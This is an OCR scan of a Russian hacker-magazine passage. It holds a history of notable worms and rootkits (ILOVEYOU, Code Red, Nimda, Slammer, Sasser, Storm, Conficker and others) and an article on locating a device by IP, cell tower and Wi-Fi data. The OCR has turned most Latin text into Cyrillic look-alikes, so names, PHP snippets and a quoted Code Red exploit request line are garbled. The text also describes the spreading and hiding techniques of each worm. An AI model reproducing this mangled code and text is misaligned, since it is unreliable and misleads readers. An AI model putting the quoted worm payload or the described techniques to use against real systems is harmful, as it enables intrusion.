мия, вызванная вирусом І_оѵе І_еМ:ег(или І_оѵе 
Вид). Письма, содержащие незамысловатое 
М0ѴЕУ01І в строке темы, посыпались на ниче- 
го не подозревавших пользователей градом. 

И все было бы замечательно, если бы к письму 
не был приложен скриптик на Ѵізиаі Вазіс 
Эсгірі, замаскированный под текстовый файл. 

ТТіе ЗиЬзесС: ІЬОѴЕУОІІ 
Меззаде Ъосіу: кіпсііу скеск кЪ.е 

аккаскесі ЬОѴЕЬЕТТЕК сошіпд Тгот те. 
АккасЬесЗ. Тііе: ЬОѴЕ-ЬЕТТЕЕ-ЕОЕ- 

УОИ . ТХТ . ѵЬз 

Налицо отличный пример социальной инже- 
нериииприем двойного расширения, — что 
помогло скрыть подлинную природу файла. По 
умолчанию Винда не показывала второе, на- 
стоящее, расширение файла, поэтому принять 
аттач за обычный текстовик действительно 
было проще простого. Ну а коль пользователь 
файл запустил, можно делать свое дело. 



Написанная с использованием механизма 
ѴѴіпбоѵѵз Эсгірііпд НозТ, малварь честно 
рассылает копии тела по всем адресам из 
адресной книги почтовой программы М5 
Оиііоок, после чего приступает к деструк- 
тивной части, закачивая и устанавливая в 
системетроя. Путь до исполняемого файла 
прописывался какдомашняя страница 
в параметрах ІпТегпеІ Ехріогег. Это обес- 
печивало его автоматическую загрузку, а 
запуск в системе гарантировал специально 
созданный ключ в реестре. Далее домашняя 
страница возвращалась на свое место — и 
ушастый пользователь даже не замечал из- 
менений. Тем временем, ѴѴІІЧ-ВІІ05ЕІХ.ЕХЕ 
или МісгозоКѵ25.ехе честно отправлял автору 
отснифанные пароли. 

Три к с использованием двойного расширения 
автор заюзал нетолько в письмах. Для файлов 
целого ряда расширений, червь создавал 
свои копии, добавляя к их названию расшире- 
ние .ѵЬз. Если в папке был файл гиІехтрЗ.то 
тутже создавался гиІехтрЗ.ѵбз стелом червя 
— и так повсюду. 



В основе другого способа распространения, 
который также давал плоды, лежали скрипты 
для тІРС — самой распространенной 
программы для бешено популярныхтогда 
ІРС-чатов. Пользователям чата автоматичес- 
ки передавалась НТМБ-ка, предлагающая 
закачать некий АсІіѵеХ-элемент. Что находи- 
лось внутри, объяснять не надо, но поверь на 
слово: посмотреть, что прислал им хороший 
приятель, соглашались очень многие. 

Первый случай активности Боѵе БеНег был за- 
фиксирован 4 мая 2000 г, а уже через сутки им 
были частично или полностью поражены сети 
ЦРУ, ЫА5А, Министерства энергетики, кон- 
гресса США, Пентагона, британской палаты 
общин и еще множества организаций. Ущерб, 
нанесенный червем в первыедни активности, 
был оценен в $5 миллионов. Офигительно? 
Виновника этого безобразия помог найти ос- 
тавленный им автограф: «Ьагок -ІоѵеІеМег(ѵЬе) 
< і Ьаіе до Іо зсбооі > Ьу: зрубег/ ізрубегйтаіі. 
сот / МапіІа.РЬіІірріпез». Но в виду отсутствия 
местныхзаконов за подобные преступления, 
никакой ответственности он не понес. 



І_оѵе1е**ег 
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СОРЕ КЕРДЕФЕЙСИЛ СИСТЕМЫ С АНГЛИЙСКОЙ ЛОКАЛЬЮ 




СЕТЕВАЯ АКТИВНОСТЬ 51-АММЕК'А 






Из-за этого червя сайту 
Белого дома США в 2002 
году пришлось поменять ІР-адрес :). Старто- 
вавшего 13 июля 2001 года, Сосіе Веб интере- 
совали виндовые машины сзапущенным веб- 
демоном N5 на борту и включенной системой 
индексирования. О существовании критичес- 
кой уязвимости, приводящей к переполнению 
буфера, в МісгозоК знали задолго до появления 
вируса, а за месяц до эпидемии была опубли- 
кована заплатка. Впрочем, это не помешало 
запущенному 13 июля червю заразить за 6 
следующихдней болееЗбОтысяч машин. 
Брешь в 155 позволяла легко выполнять на 
сервереудаленный код. Разработчики Собе 
Веб не сильно заморачивались и приделали 
эксплоит к простейшему сканеру, который 
работал «в лоб». Во время сканирования Собе 
Веб не проверял наличие N5 на новом ком- 
пьютере-жертве, а тупо отправлял специально 
сформированные НТТР-запросы на сгенери- 
рованные случайно ІР-адреса в надежде, что 
где-то на 80- порту окажется вожделенный N5. 
Море запросов— огромный объем трафика. 



В итоге, оборудование попросту стало зады- 
хаться от мусорных СЕТ-запросов, которые 
генерировали ноды по всему мира. В логах 
Арасбе, на который, естественно, уязвимость 
N5 не распространялась, можно было обнару- 
жить подобные строки: 

СЕТ /сІеТаиШ . іс1а?1Ж]ЖЬШЛЖ^ 

090%и685 

8 %исЪс!3 %и7 801 %и9 090%и6858 %исЪс!3 %и7 
801%и9 090%иб858%исЬсіЗ%и7 801%и909 0% 
и9090%и8190%и00сЗ%и0003%и8Ь00%и531 
Ь%и53 11%и007 8%и0000%и00=а НТТР/1 . О 

В процессе работы Собе Веб не использовал 
никаких временных или постоянныхфай- 
лов. Червьуникален: он существовал либо в 
системной памяти зараженных компьютеров, 
либо в виде ТСР/ІР-пакета при пересылке на 
удаленные машины. Но наличие заразы на 
сервере обнаруживалось без всякого антиви- 
руса. Поскольку в памяти компьютера могли 
существовать сразу сотни активных процессов 



Собе Веб, то тормоза и лаги были неизбежны. 
Червьзаменял содержимое страниц на 
зараженныхсерверах на сообщение: «НЕІ_1_0! 
ѴѴеІсоте Ь Шр://ѵѵ\ллл/.\л/огт.сот! Наскеб Ву 
СЫпезе!», но был избирателен и дефейсил 
только те системы, где в качестве основного 
языка был установлен английский. Через неко- 
рое время, правда, дефейс снимался автомати- 
чески: видимо, разработчики нехотели раньше 
времени терять драгоценную ноду. 

Между 20 и 28 числами месяца тело червя 
должно было начать 0о5-атаку на несколько 
ІР-адресов, один из которых принадлежал 
американскому Белому дому. 

В августе этого же года начал распространять- 
ся новый червь Собе Веб II, код которого, не- 
смотря на схожее название, был создан заново 
и предоставлял владельцам полный контроль 
над зараженными машинами, копируя файл 
стб.ехе в катал о г \і п е1:р и Ь\зс гі рІ5\ 155-серве- 
ра. В отличие оторигинального Собе Веб, клон 
старался атаковать хосты в той же подсети и 
не допускал одновременного запуска себя на 
одной системе. 



Сосіе Кее! 



Міггиба 



Запустившегося в 
сентябре 2001 года червя 
ну никакие могли не связать с деятельностью 
Алькайды, заодно рассказывая о мощныхтех- 
нологиях, применяемых в новой заразе. Ноесли 
присказки отерроризме были выдумкой жур- 
налистов, то очевидная продвинутость нового 
червя была налицо. Фишка ІЧітба заключалась 
сразу в нескольких каналах распространения, 
благодаря которым емуудалось в считанные 
минуты распространиться по Сети. Разберемся 
по порядку. 

1. Наибольший пробив был получен за счет 
эксплоита, который использовал уязвимость в 
Іпіегпеі Ехріоге’е, позволяющую автоматически 
запускать приаттаченный кписьмуфайл. При- 
крепленный кписьму ВЕАБМЕ.ЕХЕ (написаный, 
кстати, на С++) беспрепятственно запускался 
на машине при простом открытия письма, и 
комфортно начинал свое распространение. 



Причем, для поиска новых адресатов вирус 
кропотливо сканировал текстовые документы на 
жестком диске, а также запрашивал с помощью 
специальной МАРІ-функции списокадресатов с 
сервера Місгозоіі Ехсбапде. 

2 . Другой способ распространения — расша- 
ренные ресурсы влокалке. После сканирования 
всехдоступных шар ІЧітба создавал там файлы 
с почтовыми сообщениями, имеющие расшире- 
ние .ЕМБи .ІЧѴѴ5. Открытие таких файлов проис- 
ходит в почтовой программе, что автоматически 
влекло за собой заражение, какесли бы письмо 
просто пришло по почте. 

3. Не могли забыть создатели и про дырявый N5, 
уязвимость в котором уже использовали другие 
черви. Поэтому ІЧітба довольно эффективно 
пробивал майкросовский веб-демон с помощью 
уязвимости бігесіюгуіхаѵегзаі В случае зара- 
жения веб-сервера на нем случайным образом 
выбиралисьстранички, откуда начиналась 



загрузка вируса посетителям. 

4 . И еще интересный ход — ІЧітба не стеснялся 
и активно использовал для распространения 
бекдоры, оставленные в системах червями Собе 
Веб II и забтіпб/1 15. 

Добавим, что ІЧітба имел опасный побочный 
эффект, который мог допустить утечку конфиден- 
циальной информации сзараженных компьюте- 
ров. Червь добавлял пользователя под именем 
«Сиезі» в группу пользователей «Администра- 
торы». Таким образом, обычные гости получали 
полный доступ к ресурсам компьютера. Более 
того, все локальные диски открывались через 
шары для полного доступа. 

Автор этого вируса официально не найден, но 
в теле червя содержится строка, указывающая, 
что создатель из Китая: «Сопсері: Ѵігиз(СѴ) Ѵ.5, 
СоругідЫ(С)200 1 В.Р.СЫпа» 
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Зіаттег 



Незадачливые жители 
стран Северной Аме- 
рики были сильноудивлены, когда 25 января 
многие банкоматы попросту перестали рабо- 
тать. Во всем мире со сбоями работали службы 
по заказу и резервированию авиабилетов, 
многие сервисы вообще не были доступны. 

Но набивший оскомину финансовый кризис 
тут вовсе неп ричем — это лишь всплеск ак- 
тивности червя Зіаттег. Активность впервые 
замечена в 12:30 по среднеатлантическому 
времени, а к 12:33 количество зараженных 
машин удваивалось каждые 8.5 секунд. 

В основе червя лежала уязвимость в М іеговой 
5СіІ_5егѵег, концепция которой была представ- 
лена ОаѵісІ ІЛюЬбеІсІ на конференции ВІаскНаС 
Отправляя на 1434 скомпрометированный 



пакет, вирус мог выполнить на удаленной 
машине произвольный код и, в свою очередь, 
продолжить распространение. По различным 
отчетам сообщается, что вирусу удалось зара- 
зить 75.000 машин за каких-то десять минут, 

— но как? Уязвимый модуль N5, позволяющий 
приложениям автоматически обращаться к 
нужной базе данных, принимал запросы как 
раз по ІЮР, атело вируса, составляющее всего 
376 байт, отлично помещалось в один единст- 
венный ПОР-пакет. В результате 51а т те г 
не использовал тормозной ТСР, требующий 
постоянных квитков-подтверждений, а рас- 
сылал себя по ненадежному ІЮР со скоростью 
несколько десятков запросов в секунду! 
Несмотря на то, что патч для уязвимости был 
выпущен за 6 месяцев до эпидемии, а вирус 
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никак не проявлял себя на зараженной маши- 
не, последствия от 51а т те г а были колоссаль- 
ными. Роутеры и маршрутизаторы на магист- 
ралях были настолько перегружены трафиком, 
что лавинообразно выбивали другу друга в 
конце концов отключив некоторые бэкбоны. 
Южная Корея была полностью отрублена от 
инета и находилась в таком состоянии почти 
24 часа. Только представь: никакого интернета 
и мобильной связи с внешним ми ром для 27 
миллионов человек. Забавно, что многиежер- 
твы даже незнали, что на их машинеустанов- 
ленатакая специфическая вещь, как50І_. 



Заггег Ужчто-что, а окошко 

Бузует ЗЬіФсІоѵѵп, ини- 
циированное І\ІТАІІТН0ПІТѴ\5Ѵ5ТЕМ с обрат- 
ным отсчетом и сообщением о принудительной 
перезагрузке компьютера видел почти каждый 
— годом ранее, во время эпидемии Віазіег’а, 
либо же в 2004, когда стал бушевать во многом 
похожий на негоЗаззег. Принципиальная 
разница червей втом, что они используют кри- 
тическиеуязвимости в разных службах. Для 
размножения Заззег использует баг перепол- 
нения буфера в службе І_оса15есигі1:уАи1:Ьогі1:у 
ЗиЬзузІет Зегѵісе (І_5А5) — отсюда и название 
червя. Написанное на С++тело5аззегв пер- 
воначальной версии открывает 128 парал- 
лельных потоков, и, используя специальный 



алгоритм по генерации ІР-адресов, пытается 
найти системы с незащищенным 445 портом 
и уязвимым сервисом. Сплоит работал на 
«ура», правда, приводил кошибке на системе 
пользователя. Заззег открывал на 9997 порту 
шелл, через который далее и заливалось все 
необходимое. Самотело червя без лишнего 
геморроя просто передавалось по протоколу 
через РТР, причем сервертакже открывался 
на зараженных компьютерах на 5554 порту. 
Как часто бывает, шелл-код сплоита отли- 
чается отсистемы ксистеме, поэтому Заззег 
предварительно проверял версии удаленной 
системы, чтобы выбрать правильный набор 
параметров для атаки. 

Оригинальная версия червя Заззег распро- 



странялась достаточно медленно, но через 
несколько дней в Сети были выпущены моди- 
фикации, распространяющиеся гораздо быст- 
рее. К этому моменту число зараженных машин 
измерялосьсотнямитысяч, а в пике эпидемии 
речь шла о миллионах. В Финляндии были 
отменены рейсы местной авиакомпании, во 
многих странах закрыты некоторые отделения 
крупнейших банков. Автором заразы оказался 
18-летний немецкий студент Свен Яшан, хотя 
изначально разрабатывался «русский след». 
Юного вредителя заложил кто-то из своих, 
позарившись на обещанное Мі егозой’ ом 
награждение в 250.000 баксов. Помимо Заззег, 
на компьютере парнишки нашли еще и много- 
численные модификации червя Ыеізку. 
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ВРЕМЕННЫЙ ФАЙЛ ѴѴАКЕ20Ѵ 



Зопу гоо+кі+ 



Забавный факт: это 
единственный руткит, 
который распространялся легально! ѴѴіп32/ 
РооІкіІ.ХСР, или «во пу гооікіі», является частью 
системы защиты аудио-С0 р выпускаемых5опу 
ВМО. Растроенная всепоглощающим пиратст- 
вом компания решила бороться с нелегальным 
копированием с помощью ОРМ-компонентов 
(Оідііаі ВідЫ:5 Мападетепі;], а в попытке скрыть 
их присутствие в системе обратилась в компа- 
нию РігзЫ Іпіегпеі:, чтобы те написали маскиру- 
ющий руткит. В итоге, система защиты дисков 
вместе с руткитом стала инсталлироваться на 
компьютер пользователя автоматически, когда 
в привод вставляется защищенный компакт- 



диск. Послеустановки, в системе появлялись 
два новых сервиса, которые и выполняли все 
функции. Установленный драйвер $5уз$агіе5 
(агіез.зуз) скрывает все файлы и ключи в реест- 
ре, которые начинаются с «$зуз$» посредством 
перехвата нативных АРІ-функций. ѴѴіп32/ 
ВооікііХСРотслеживаетобращения кЗузІют 
ЗегѵісеТаЫе (55Т) и перехватываетобращения 
к функциям : ІЧЮгеаІюРіІе, ЫіЕпитегаІеКеу, 
ІЧЮрепКеу, ЫШиегуОігесІогуРіІе, 
МШиегуЗузІетІпЬгтабоп. В результате удает- 
ся скрыть присутствие ключей в реестре, папок, 
файлов и процессов. 

Ты спросишь: а в чем, собственно, трабл? Ну, 
скрывает этот руткит работу нужных ему компо- 



нентов, что стого? Очень просто. Сразу после 
появления руткита, Марк Руссинович в своем 
блоге рассказал о многочисленных брешах в 
собственной защите программы. И был прав: 
оченьскоро механизм, предназначенный для 
сокрытия файлов и процессов, быстро приспо- 
собили для своих нужд кодеры вирусов. Более 
того, распространение этого ноу-хао само по 
себе приводило к нестабильности системы, 
зависанию компьютера и потере данных из-за 
кривых драйверов, установленных в систему. И 
даже тогда, когда Зопу выпустила специальную 
тулзу, избавиться от это дряни полностью было 
очень и очень затруднительно. 



На дворе — 2006 год, 
только вот ушастые 
пользователи по-прежнему открывают все 
вложения в письмах, а программно им мало кто 
запрещаетэто делать. Результат? Огромный 
ботнетѴѴагегоѵіонже Зіхабоп), который авторы 
сумели собрать за счет одноименного червя, 
рассылаемого по етаіі. Никакихсплоитов и 
уязвимостей, — социальная инженерия и людс- 
кая тупость. И ведь повсютрубят: «Не открывай 
вложений» — так ведь все равно кликают. 
Особенность червя ѴѴагегоѵ — в огромном 
количестве вариаций, которые появлялись, как 
грибы после дождя. Был момент, когда новые 
модификации появлялись чуть ли неразвЗО 
минут. Даже с обновленными антивирусными 



базами многие юзеры оставались неудел. 
Впоследствии, когда на веб-серверах глобаль- 
но начали вычищать все письма со зловред- 
ными аттачами, модификации перекинулись 
на ІМ-сети. А один из вариантов ѴѴагегоѵ стал 
первым червем, который распространялся 
через Зкуре! 

Каки подобаеттрою для ботнета, телоѴѴагегоѵ 
позволяло владельцам загрузить на компьютер 
любую заразу. Червь содержит в себе список 
жестко прописанных ББІ-адресов (что, конеч- 
но, минус], которые он проверяет на наличие 
файлов. В случае если по какому-либо из этих 
адресов будет размещен файл, он загрузится в 
систему и запустится. Основной модульѴѴагегоѵ 
способен завершать различные процессы, а 



также останавливать и удалять службы анти- 
вирусных программ и персональныхбранд- 
мауэров. Для организации рассылки червь 
использует собственный ЗМТР-сервер. Глав- 
ное использование ботнета — это, конечноже, 
спам. Однако многие ноды служили для хостин- 
га так называемых базі-біих платформ, позволяя 
спамерам прятать настоящее расположение 
их спамерских сайтов за ІР-адресом жертвы. ІР 
менялся настолько часто, что его невозможно 
было прикрыть. ѴѴагегоѵ достигал этого двумя 
средствами: во-первых, геѵегзе НТТР ргоху, ко- 
торая получала контенте настоящего (скрыва- 
емого] сайта, а также БЫЗ-сервера, на котором 
специальная версия Віпб под ѴѴіпбоѵѵз меняла 
записи по нужному алгоритму. 



Ѵагегоѵ 



сг^ 0ГГСі Ботнет, созданный с 

-г і помощью червя Зіогпп, 
можно смело назвать произведением искуст- 
ва. Децентрализованная Р2Р-сеть, в которой 
большинство хостов сидиттихо и ждетуказа- 
н ий. Доменные имена разрешаются в постоян- 
но меняющиеся ІР-адреса (опять же (азіЧІих 
ботаіпз]. Часть кода червя — полиморфная. 

В пике — более миллиона инфицированных 
хостов. Как это удал ось? 

Эпидемия червя началасьс компьютеров 
в Европе и Соединенных Штатах 19 января 
2008 года, когда, прикрываясьтемой урагана 



в Европе, пользователям повалились письма 
с предложением открыть вложенный файл с 
названиями ЕиІІСІір.ехе, ЕиІІЭіюгу.ехе, Реаб 
Моге.ехе или Ѵібео.ехе. 

Все попавшиеся на удочку машины автомати- 
чески объединялись в ботнет, но в отличие от 
других сетей, он не использовал специальный 
управляющий сервер, доступ к которому легко 
перекрыть. Принцип управления Эіогт боль- 
ше напоминает пиринговую сеть, в которой 
зараженные ноды подключаются ксвоему 
управляющему хосту (он руководитобычно 
30-45 зомби], а хосты взаимодействуют между 



другдругом. Причем рольхоста в случае не- 
обходимости можетзанятьлюбая из нод. Вся 
сетьустроена так, что полного списка нодов 
нет ни у кого, поэтомуточные размеры ботнета 
так и остались загадкой. По разным подсче- 
там, он варьировался от одного до нескольких 
миллионов машин. 

Помимо функций по работе с ботнетом, Эіюгт 
устанавливает в системе руткит: ѴѴіп32.адепЕ 
сІЬ, посредством которого держатели ботнета 
могли стащитьлюбую конфиденциальную 
инфу, рассылать спам и устраивать мощные 
ББоЭ-атаки. 



► 024 
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ТЕХНИКА РА5Т-РШХ В КАРТИНКАХ 



РАЗНЫЕ СПОСОБЫ РАСПРОСТРАНЕНИЯ ЧЕРВЯ 
РОѴѴЫАРЦР 




ЧЕРЕЗ ВНЕШНИЕ НОСИТЕЛИ 
ИСПОЛЬЗУЯ АВТОЗАПУСК 
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ЧЕРЕЗ «СЕТЕВОЕ ОКРУЖЕНИЕ», 
ПЕРЕБИРАЯ ПАРОЛЬ АДМИНИСТРАТОРА 
КСИСТЕМНОЙ ШАРЕА0Мт$ 
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ПРОПАТЧЕННЫЕ СИСТЕМЫ 
С НАДЕЖНЫМ ПАРОЛЕМ 
НАСИСТЕМНЫЕШАРЫ 



ИСПОЛЬЗУЯ ЭКСПЛОИТ 
ДЛЯ УЯЗВИМОСТИ М508-067, 
НАЙДЕННОЙ ВО ВСЕХ ВЕРСИЯХ 

ѵѵтооѵѵБ 



МегЬооі 



Загрузочные вирусы, 
о которых все благопо- 
лучноуспели забыть, возвращаются. В 2005 
году на хакерской конференции Віаск На! 
специалисты еЕуе 0іді1:а15есигМ:у продемонс- 
трировали концепттак называемого буткита, 
размещающего в загрузочном секторедиска 
код, который перехватываетзагрузку ядра 
ѴѴіпсІоѵѵз и запускает бэкдор с возможнос- 
тью удаленного управления по локальной 
сети. Презентация прошла на ура, а в 2008 
году, после длительного затишья в области 



руткитов, выстрелил МеЬгооТ Новый троян 
использовал представленную еще в 2005 году 
идею и размещал свое тело в бут-секторе 
диска, после чего вносил модификации в 
ядро Винды, которые затрудняли обнару- 
жение вредоносного кода антивирусами. 
Подцепить заразу мог кто угодно: компы 
заражались через свежие сплоиты с попу- 
лярных сайтов. Вредоносный кодсначала 
изменяет МБР (главная загрузочная запись], 
записывает руткит-части в сектора диска, 
извлекает из себя и устанавливает бэкдор 



в ѴѴі псіоѵѵз, после чего самоудаляется. В 
результате заражения, в МБР размещаются 
инструкции, передающиеуправление основ- 
ной части руткита, размещенного в разных 
секторах жесткого диска. Именно эта часть, 
уже после загрузки системы, перехватывает 
АРІ-функции и скрываетзараженный МБР. 
Крометрадиционных функций по сокрытию 
своего присутствия в системе, вредоносный 
код устанавливает в ѴѴіпсІоѵѵз бэкдор, который 
занимается кражей банковских аккаунтов. 



Роѵпасіир 



Червя, нашумевшего в 
январе, называютпо-раз- 
ному: Боѵѵпасіир, Сопбскег, Кібо. Важно одно: 
новой малвареза несколько дней удалось 
заразить миллионы компьютеров, и собранный 
ботнет функционирует до сих пор. Разработчи- 
кам удал ось лихо диверсифицировать способы 
распространения, объединив в одном черве 
сразу несколько успешных методик. Самый 
эффективный способ — приватный сплоит, 
использующий непропатченную систему с 
уязвимостью переполнения буфера М508-067 в 
сервисе «Сервер» (патч вышел еще в октябре]. 
Для этого червь отсылаетудаленной машине 
специальным образом сформированный РРС- 
запрос, вызывающий переполнение буфера 
при вызове функции ѵѵсзсру_5 в библиотеке 



пеѣа рі32.сІ II. На компьютере запускается спе- 
циальный код-загрузчик, который скачиваете 
уже зараженной машины исполняемый файл 
червя и запускает его. 

Кроме этого, червь отличнотиражируетсебя 
через «Сетевое окружение», перебирая 
парольадминистратора ксистемной шаре 
АБМІІ\І$.Адавно известный способ распро- 
странения через флешки претерпел изме- 
нения: в результате обфускации АіЛогип.іп^ 
(разработчики просто добавили в файл кучу 
мусора] удалось обмануть многие сигна- 
турные антивирусы. Несколько способов = 
максимальный эффект! Другая ключевая 
особенность заключается втом, какчервь 
скачивает на зараженную маши ну троя на (для 
дальнейшей рассылки вируса, ББоЗ’а ит.д.]. 



Разработчики отказались от размещения 
файлов на каком-то жестко зафиксированном 
серваке. Вместо этого код червя получает 
на нескольких популярных ресурсахтеку- 
щую дату и по ней генерируетсписок из 250 
доменов, используя специальный алгоритм. 
Задача хозяев ботнета — заблаговременно 
эти домены зарегистрировать и разместить 
там файлы для загрузки. Противостоять этому 
не столько сложно, сколько дорого. 
Перехватывая АРІ-вызовы, отвечаю- 
щиеза обращение к Б N5, заразе долгое 
время удавалось сдерживать антивирусы, 
которые банально не могли обновиться, об- 
ращаясь к за блокированным до менам, со- 
держащим слова казрегзку, поб, зутапіес, 
тіегозой и т.д. т 
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НАВИГАЦИЯ 





Как определить свои координаты по ІР, 65М/ІІМТ5 и ѴѴі-Рі 



Тысячи летназад отакой штуке, какОРЗ, никто не могдаже мечтать. 
Но моряки и путешественники отлично справлялись с навигацией, 
используя компас и карты, солнце и звезды. Сейчас — век цифровой, 
нотоже есть немало способов определить месторасположение без 
всякихтам систем глобального позиционирования. 



Спору нет. 6Р5 — классная штука, но что делать, если приемника 
под рукой нет? Далеко неу каждого есть встроенный чип в мобиле. 

Да и владелецавтомобиля совсем не обязательно успел обзавестись 
устройством навигации. Так какже быть? Если не брать в расчет редкие и 
экзотические варианты, то основных способа три: 

1. Определить ІР и с помощью специальной базы данных определить 
город, в котором находишься, и нередко — долготу и широту. 

2. Определить расположение по находящимся рядом базовым станциям 
65М/ІІМТ5. Это возможно при наличии базы данных с идентификатора- 
ми вышек и их координатами. 

3. Использовать для вычисления широты и долготы информацию о 
находящихся рядом точках доступа ѴѴі-Рі, передав запрос с их характе- 
ристиками на специальный сервер. 

Итак, начнем с самого простого. 

^ ІР НАМ В ПОМОЩЬ 

Когда мне нужно проверить свой внешний ІР, чтобы убедиться, 
например, что я включил ѴРІЧ или прокси, я всегда использую сервис 
ір21оса1:іоп.сот . Приятно, что, помимо самого ІР-адреса, выводится 
информация о провайдере, его месторасположении (город, страна, 
штат), а зачастую... еще и координаты. Само собой, в базе не будут 
указаны широта и долгота для самого обычного клиента интернет-услуг. 
Как правило, данныеуказываются для провайдера, реже — для крупных 
компаний, имеющих большие диапазоны статических ІР. Получается, 
что, подключившись ксети (например, через любой открытый Ьоізроі 
или просто воспользовавшись компьютером), можно с большой долей 
вероятности определить примерное место, где ты находишься. Конечно, 
способ примитивный — и более того, самый неточный из всех представ- 
ленных в этой статье. С другой стороны, это реальный шанс определить 



месторасположение, всего лишь открыв страничку в интернете. Аесли 
сварганить специальный трекер, установить его на КПК и отслеживать 
ІР-шники, которые он получает при коннекте к открытым ѴѴіРі -сетям, то 
реально вычислить передвижения девайса. 

Использоватьсервис в чистом виде, а именно — переходя браузером 
по ссылке ір21оса1:іоп.сопп . скучно и беспонтово. Месторасположение на 
карте не увидеть, лог не сохранить, а сама страница слишком тяжелая 
для мобильного инета — короче, это не наш путь. От сервиса нам нужно 
только одно — база соответствий разных ІР-адресов их расположению, 
которую ір21осабоп предлагает приобрести за довольно разумные 
деньги. Само собой, подобные базы быстро расплываются по варезным 
порталам иторрентам, причем в двух вариантах: .сѵз (текстовом) и .Ьіп 
(бинарном). С такой базой несложно заточить любое приложение под 
себя. Правда, ІР-адрес в базе хранится в специальном цифровом виде 
без точек и разделения на октеты, но следующая РНР-функция поможет 
привести обычный ІР-шниккнужному виду: 

ЕипсЕіоп БоС2ЬопдІР ($ІРас1с1г) 

{ 

ІЕ ( $ІРаскІг == " " ) { 
геЕигп 0; 

} еізе { 

$ірз = зрііс ( " \ . " , " $ІРас1с1г " ) ; 

геЕигп ($ірз[3] + $ірз[2] * 256 + $ірз[1] * 256 * 256 
+ $ірз [0] * 256 * 256 * 256) ; 

} 

} 

Имея такой ключ для адреса, ничего не стоит найти соответствующие 
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|База данных і р21оса1:іопИ 



ІР Агігігезз 


: Э3<81<22<134 


Іосаііоп 


О яшзіап реоеяаткж заіегг 


РЕтвязеияо еггѵ, зт. ретеязвііяб 


Байіисіе / Іопдііисіе 


5Э.834 І_АТГШОЕ„ 30.264 Ц0НШТ1ЛЭЕ 


Соппес*1пд іЬгоидЬ 


ВЯОАОВАІЧО СиЗТОМЕЯЗ Ш ЗТ. РЕТЁЯЗВіЖе 


Тіте 2опе 


ІІТС +03і00 


100 Со гіе 


7 




азххооэі - ЗАікт РЕТЕЯзвте 



[Координаты по ІР-адресу? Легко! Но очень неточно : 




(Определяем координаты по параметрам МЫС, МСС, БАС, Сей Ю базовой 
|станции, к которой подключены^ 



ему координаты в текстовой базе. Если же в распоряжении будет база 
в ВІЫ-формате.то задача еще проще. Для Регі, С, Руібоп, РНР, Рыбу, 

С# р ѴВ.ІЧЕТ, 2аѵа, Ѵізиаі Вазіс сервисом подготовлены готовые модули 
( ЬіІр:/Ал/ѵѵ\л/.ір21осаІіоп.соі7і/сІеѵеІорег5.а5рх ]. которые легко использо- 
вать в своем проекте. В случае с РНР достаточно закинуть на сайт модуль 
ІР2Еосабоп.іпс.рбр и создать несложный скриптик: 

<?р]тр 

іпсіисіе ( " ІР2ЬосаЕіоп. іпс .ріір" ) ; 

$ ір = ІР2Ьосаііоп_ореп ( " вашрІее/ІР-СОШТКУ-ЗАМРЪЕ . ВІКГ" , 
I Р2 ЬОСАТ I СЖ_8Т.?ЩГОАКБ ) ; 

$гесогс! = ІР2ЬосаЕіоп_деЦ_а11 ( $ір , "_ІР-АДРВС_" ) ; 

есЕю " $гесогс!->соипЦгу_1опд : " . $гесог<Ц->соипЕгу_1опд; 

есЕю " $гесогс!->сіЦу : " . $гесогс!->сіЦу ; 

есЕю " $гесогс!->ізр : " . $гесогсІ->ізр; 

ее Ею " $гесогсІ->1аЦіЦисІе : " . $гесогсі->1аЕіЕисіе; 

есЕю " $гесогс!->1опдіЦисІе : " . $гесогсі->1опдіЕисіе ; 

ІР2ЬосаЕіоп_с1озе ( $ ір) ; 

?> 

Можно просто вывести на экран, залогировать или отобразить на карте с 
помощью Ооодіе Марз, передав широту и долготу в качестве параметра: 

ЕЩЦр : //шарз . доодіе . сот/тарз?:Е=1&Еі.1=еп&д= ' +диегу+ 1 &пеаг 
= 1 +зЕг ( ІаЕ) + ' , ' +зЕг (Іпд) + ' &іе=ІЛТ8&2=12&от=1 

Н ИСПОЛЬЗУЕМ МОБИЛЬНЫЕ ВЫШКИ! 

Старая байка отом, что спецслужбы могут найти человека по сигналу 
отего мобильника — один из тех случаях, когда на самом деле все таки 
есть. Да чего там спецслужбы, если на это способна даже совершенно 
бесплатная программа Ооодіе Марз [ \ллл/ѵѵ.доод Іе. сот/д тип ]. 

По сути, это удобная оболочка для доступа к одноименному веб-сервису, 
позволяющему смотреть фотографии местности со спутника, рельеф и — во 
многих случаях — карты с возможностью проложить маршруты. Думаю, 
рассмотреть крышу своего дома через тарз.аооаіе.сот пробовали все. 
Работать с та ким сайтом через браузер на мобильном телефоне (даже если 
это сверхскоростная Орега Міпі) крайне сложно, поэтому в Ооодіе, подсу- 
етившись, сделали удобную оболочку для просмотра карт. Оформили ее в 
виде приложения для самых разных платформ — отобычных мобильных, 
поддерживающих ^ѵа, до смартфонов и коммуникаторов на ѴѴіпбоѵѵз 
МоЬіІе и БутЬіап 560 Згб Ебіііоп, престижных ВІаскВеггу, а теперь еще и 
Апбгоіб, ккоторой мы пока непривыкли, но очень скоро будем восприни- 
мать какодну из основных платформ для телефона. Втомже іРЬопе Ооодіе 
Марз встроена поумолчанию.Таквот, помимоудобного просмотра этих 
самых карт и спутниковых снимков, уутилиты есть одна замечательная 
кнопка «Мое месторасположение». Один клик — и на карте отмечается 
н а хожде н и е тел ефо н а . Д а , дл я владельце в трубок с О Р5 это суща я е рун да : 
нашли чем удивить! Но надо видеть лица тех пользователей, которые обна- 



ружили на экране свое месторасположение, хотя никаких навигационных 
приблуду них не было и в помине! Впрочем, это то ль ко та к кажете я. 
Телефонная трубка всегда находится в зоне действия, по меньшей 
мере, одной базовой станции сотовой сети. Ну, или не находится — но в 
этом случае от нее толку не более чем от кирпичика. Любая из базо- 
вых станций имеет некоторый набор параметров, которые получает 
телефон — благодаря этому каждую БС можно распознать. Один из таких 
параметров — СеІІЮ (сокращенно СЮ] —уникальный номер для каждой 
соты, выданный оператором. Зная его, ты можешь распознать базо- 
вую станцию, а зная расположение базовой станции, можешь понять, 
где находишься. Точность варьируется от нескольких сотен метров до 
нескольких километров, но это неплохая отправная точка, чтобы разо- 
браться с координатами. 

Получается, имея в наличии табличку, где в соответствии с каждой 
базовой станцией будет сопоставлены ее координаты, можно примерно 
вычислить положение абонента. А раз Ооодіе Марз можеттаклихо опре- 
делять месторасположение человека, то у него такая база данных есть. 
Но откуда? Расположение базовых станцией различных операторов — 
пускай и не секретная, но врядли открытая информация. Даже учитывая 
масштабность проектов Гугла, с трудом можно поверить, что тот догово- 
